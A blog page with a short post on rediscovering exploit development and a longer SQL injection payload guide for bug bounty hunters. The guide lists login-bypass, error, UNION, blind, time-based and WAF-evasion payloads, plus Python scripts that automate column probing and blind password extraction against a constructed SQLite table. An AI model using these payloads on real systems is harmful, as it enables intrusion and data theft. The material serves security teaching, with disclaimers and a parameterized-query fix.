Wednesday, August 6, 2025

Rediscovering My Passion for Exploit Development

 I didn’t have an internet connection for the past two weeks — and honestly, it drove me a little crazy. To ease my boredom, I started digging through old files on my PC looking for something interesting to read.

That’s when I stumbled upon a research paper I had downloaded years ago. The title immediately grabbed my attention:
"Identifying Code Injection and Reuse Payloads in Memory Error Exploits."



Curious, I opened it up and started reading. Although it was packed with highly technical terms and clearly targeted toward C/C++ and assembly language programmers, it still resonated with me. I used to code in C and C++ around 12 years ago, so some of the concepts felt familiar — and exciting.

What really sparked my interest was the realization that this paper dives deep into code injection and reuse attacks, particularly ROP (Return-Oriented Programming) techniques. I had dabbled in code injection before — in fact, I even published a demo program about it here on this blog a couple of years ago. But this paper took things to an entirely new level. I hadn't realized just how deep this rabbit hole goes.

Unfortunately, the paper lacked practical examples — something I really needed to bridge the gap between theory and application. But it gave me a ton of keywords and ideas that I could explore further.

So the moment I got back online this morning, I went straight to ChatGPT and started asking:

  • What is this term?

  • Why is it used?

  • Can you build a sample program for this exploit?

I wanted to understand everything the paper didn't explain in detail — and now I feel like I'm finally connecting the dots. I'm especially excited about how this knowledge can eventually be applied to bug bounty hunting and security research.

This is just the beginning of my journey into ROP attacks, memory exploits, and advanced code reuse techniques. Stay tuned — I’ll be sharing what I learn, along with code samples, demos, and more.

Let’s dive deep into exploitation — one gadget at a time.

SQL Injection Payloads for Bug Bounty Hunting: A Hands-On Guide

 SQL Injection (SQLi) remains one of the most impactful web vulnerabilities — despite being known for over two decades. As a bug bounty hunter, mastering SQLi techniques can earn you serious recognition, bounties, and credibility. But responsible hacking always starts with permission. In this post, we’ll explore practical SQLi payloads you can use only on authorized targets, like those listed on platforms such as HackerOne, Bugcrowd, Synack, and YesWeHack.


Legal Disclaimer

This blog is for educational purposes only. Do not use these techniques on systems you do not have explicit permission to test. Always respect the rules of engagement (RoE) in your bug bounty program.


What is SQL Injection?

SQL injection occurs when untrusted input is concatenated into the text of a database query, so that a character such as a single quote ends the intended string literal and the rest of the input is parsed as SQL. Depending on the query and the database account's privileges, that lets an attacker read or change data they should not reach, bypass authentication, or (through file access, stacked queries or stored procedures) move toward full system compromise. The root cause is building the query as a string; parameterized queries (prepared statements) remove it by sending values to the database separately from the SQL text.


Where to Look for SQLi?

SQLi opportunities can be found in:

  • Login forms

  • Search bars

  • Product filters

  • URL parameters

  • HTTP headers (e.g., User-Agent, Referer)

  • Cookies and hidden fields


Basic SQLi Payloads

These payloads test for simple injection points.

' OR '1'='1
' OR 1=1 --
admin' --
' OR '1'='1' --

Try them in the username and password fields of a login form. If the application builds its query by concatenation, the leading quote closes the string literal and the rest is parsed as SQL: the admin' -- payload comments out the password check, and ' OR '1'='1 in the password field turns WHERE username = '...' AND password = '' OR '1'='1' into a condition that holds for every row. Two details matter in practice. AND binds tighter than OR, so the same tautology in the username field with a wrong password still fails; put it in the last condition or follow it with a comment. And in MySQL a -- comment must be followed by whitespace, so end payloads with "-- " (trailing space), "-- -" or "#" rather than a bare --.
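To see exactly why these payloads work, here is an added example (not code from the original post): a minimal login check against a constructed in-memory SQLite users table, written once the vulnerable way (string concatenation) and once with bound parameters, with the payloads above applied to both. The table contents and the function names are assumptions made for the illustration.

```python
import sqlite3

# Constructed sample data: an in-memory SQLite users table standing in for
# the application's database (assumption for this illustration).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "S3cret!"), ("alice", "hunter2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Builds the query by concatenation, so a quote in the input ends the
    string literal and everything after it is parsed as SQL.
    Returns the matched username, or None (also on a SQL error, as an app
    that shows a generic error page would)."""
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """Same check with bound parameters: the SQL text is fixed and the driver
    passes the values separately, so a quote is just another character."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def run_payloads(conn: sqlite3.Connection) -> dict:
    """Applies the basic payloads to both implementations.
    Each value is (result of vulnerable login, result of parameterized login)."""
    attempts = {
        "comment out password check": ("admin' --", "wrong"),
        "tautology in password field": ("nobody", "' OR '1'='1"),
        "tautology in username field": ("' OR '1'='1", "wrong"),  # AND binds tighter than OR
        "tautology plus comment": ("' OR 1=1 --", "wrong"),
    }
    return {
        name: (login_vulnerable(conn, u, p), login_parameterized(conn, u, p))
        for name, (u, p) in attempts.items()
    }


if __name__ == "__main__":
    for name, (vuln, safe) in run_payloads(make_db()).items():
        print(f"{name:30s} vulnerable -> {vuln!r:10s} parameterized -> {safe!r}")
```

Note the third case: the tautology in the username field fails against the vulnerable code because the trailing AND password = 'wrong' still has to hold, which is why the comment variant and the password-field variant are the ones that log you in as the first row (admin). The parameterized version returns None for every payload.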


Error-Based SQLi

Use these when the server echoes database error messages back into the response. The idea is to force an error whose text contains the value you want; casting a string to an integer does that in PostgreSQL:

' AND 1=CAST((SELECT current_user) AS INT)--
' AND (SELECT COUNT(*) FROM users) > 0--

The first payload fails with a message along the lines of invalid input syntax for type integer: "postgres", so the database user is leaked inside the error itself. It is PostgreSQL-specific: MySQL's CAST silently converts bad input instead of raising, so there the usual route is an XPath error from extractvalue() or updatexml() with the wanted value concatenated into the expression. The second payload is really a boolean probe: it only errors if the users table does not exist, and otherwise just changes which rows come back.

Look for verbose error messages like:

You have an error in your SQL syntax...

That text is MySQL's; PostgreSQL, SQL Server and Oracle each word their errors differently, and recognising them also tells you which dialect to target.


UNION-Based SQLi

This technique appends a second SELECT to the original query with UNION SELECT, so rows you choose are rendered wherever the application prints its legitimate results. The injected SELECT must return the same number of columns as the original query, with compatible types, which is why NULL placeholders are used:

' UNION SELECT null, user() --
' UNION SELECT null, database(), version() --

(The first assumes the original query returns two columns, the second three.) Find the column count with ORDER BY: raise the index until the database complains that the position is out of range, and the last value that worked is the count:

' ORDER BY 1--
' ORDER BY 2--

Then replace the NULLs one at a time with a string literal to learn which columns the page actually displays and which accept text.

Blind SQLi (Boolean-Based)

Ideal when the application behaves differently for true and false conditions even though it shows no errors and no query output.

' AND 1=1 --
' AND 1=2 --
' AND SUBSTRING(@@version,1,1)='5' --

The first two establish the oracle: if the 1=1 response differs from the 1=2 response, you can ask yes/no questions. The third asks one (is the MySQL or SQL Server major version 5?). Extracting a whole value means one question per character, or a binary search over each character's code, which is why this is normally scripted. Watch for changes in response length, status code or content, not only the visible page.
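Both the ORDER BY column-count probing from the UNION section and the per-character boolean extraction from this one are mechanical enough to script. The following is an added example, not code from the original post: it runs both against a constructed in-memory SQLite "product search" that concatenates the search term into its query. The tables, the search function and the payload shapes are assumptions for the illustration, and SQLite's unicode() and substr() stand in for MySQL's ASCII() and SUBSTRING().

```python
import sqlite3

# Constructed stand-in for a vulnerable product-search endpoint (assumption
# for this illustration, not the original post's code).
def make_app() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (name TEXT, price REAL);
        INSERT INTO products VALUES ('apple', 1.25), ('banana', 0.5);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'Pa55!'), ('alice', 'hunter2');
    """)
    return conn


def search(conn: sqlite3.Connection, term: str):
    """The injectable endpoint: returns result rows, or None when the query
    fails (the equivalent of an HTTP 500 from a real application)."""
    sql = "SELECT name, price FROM products WHERE name LIKE '%" + term + "%'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def find_column_count(conn: sqlite3.Connection, max_cols: int = 20):
    """ORDER BY n succeeds while n <= number of columns; the first n that
    errors is one past the count. 'zzz' is chosen so no real row matches."""
    for n in range(1, max_cols + 1):
        if search(conn, f"zzz' ORDER BY {n}-- ") is None:
            return n - 1
    return None


def union_extract(conn: sqlite3.Connection, expression: str):
    """Appends a SELECT with the same column count as the original query and
    reads the expression back from the first column of the returned rows."""
    cols = find_column_count(conn)
    if not cols:
        return None
    select_list = ", ".join([expression] + ["NULL"] * (cols - 1))
    rows = search(conn, f"zzz' UNION SELECT {select_list}-- ")
    return rows[0][0] if rows else None


def blind_true(conn: sqlite3.Connection, condition: str) -> bool:
    """Boolean oracle: rows come back only when the injected condition holds."""
    return bool(search(conn, f"zzz' OR ({condition})-- "))


def blind_extract(conn: sqlite3.Connection, subquery: str, max_len: int = 64):
    """Recovers the scalar result of `subquery` one character at a time,
    binary-searching each code point in the range 0..127 (7 requests per
    character). Returns (recovered string, number of requests sent)."""
    result, sent = "", 0
    for i in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            sent += 1
            if blind_true(conn, f"unicode(substr(({subquery}), {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            # substr past the end yields '', unicode('') is NULL, so every
            # comparison is false and the search settles on 0: string complete.
            break
        result += chr(lo)
    return result, sent


if __name__ == "__main__":
    app = make_app()
    print("columns:", find_column_count(app))
    print("UNION  :", union_extract(app, "sqlite_version()"))
    print("blind  :", blind_extract(app, "SELECT password FROM users WHERE username='admin'"))
```

Against a real target the search() function would be an HTTP request and blind_true() would compare the response to the 1=1 baseline; the extraction loop itself stays the same, and the request count it returns is what you trade off against rate limits and the program's rules of engagement.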


Time-Based Blind SQLi

Detectable via delayed responses using SLEEP() (MySQL) or WAITFOR DELAY (SQL Server).

' OR IF(1=1, SLEEP(5), 0)--
'; WAITFOR DELAY '0:0:5'--   (SQL Server; needs stacked queries)

Useful when nothing in the response content changes but the time it takes reveals whether the condition was true. Two caveats: a SLEEP() inside a WHERE clause runs once per row the database evaluates, so the observed delay can be a multiple of what you asked for (keep the value small and compare against a baseline measurement), and the semicolon form only works where the driver executes stacked queries, which SQL Server allows and many MySQL client configurations do not.


Targeting Specific Databases

Each example below assumes the original query returns as many columns as the injected SELECT; pad with NULL as needed. Oracle additionally requires a FROM clause on every SELECT (use dual when you have no table to name).

MySQL

' UNION SELECT user(), database() --

PostgreSQL

' UNION SELECT current_user, version() --

SQL Server

' UNION SELECT system_user, @@version --

Oracle

' UNION SELECT banner FROM v$version --


Bypassing WAFs

Use encoding, case changes, or SQL comments:

%27%20OR%201=1--
' oR '1'='1
'/*!UNION*/ SELECT NULL,NULL--
%27UnIoN%20SeLeCt%20null,null--

WAFs may block obvious patterns, but these tricks can sneak past. Know what each one actually relies on: URL encoding only helps against a filter that inspects the raw request, because the web server decodes it before the value reaches the query (double encoding, such as %2527 for a quote, is the next thing to try when the WAF decodes once). Case changes defeat only case-sensitive signatures. The /*!...*/ form is a MySQL "version comment" that MySQL executes; other databases treat it as an ordinary comment and the keyword simply disappears.


Tools of the Trade

  • sqlmap — Automated SQLi detection and exploitation; leave --risk at its default unless you understand that the higher settings include tests that can alter data

  • Burp Suite — Intruder (built in) for manual fuzzing, plus BApp Store extensions such as SQLiPy, which drives sqlmap from inside Burp

  • NoSQLMap — For MongoDB and other NoSQL targets (a different injection class; the SQL payloads above do not apply there)

  • HackTricks SQLi Cheatsheet — Excellent reference


Pro Tips for Bounty Hunters

  • Log all payloads: Always keep a record of what you tested and how.

  • Try every input vector: Don’t just test URLs — check headers and cookies too.

  • Understand the app logic: Knowing how queries are structured helps tailor your payloads.

  • Respect the scope: Always stay within allowed domains/endpoints.


Final Thoughts

SQL Injection is more than just a classic bug — it’s still a high-value target in bug bounty hunting. Understanding how and where to inject payloads can make the difference between a $0 report and a $5,000+ bounty.

Want to sharpen your skills? Try labs like:

  • PortSwigger Web Security Academy

  • Hack The Box

  • TryHackMe

Happy hunting, and stay ethical!


Follow Me for More

Got a favorite payload or tool? Share it in the comments!

Subscribe for more bug bounty techniques and real-world examples.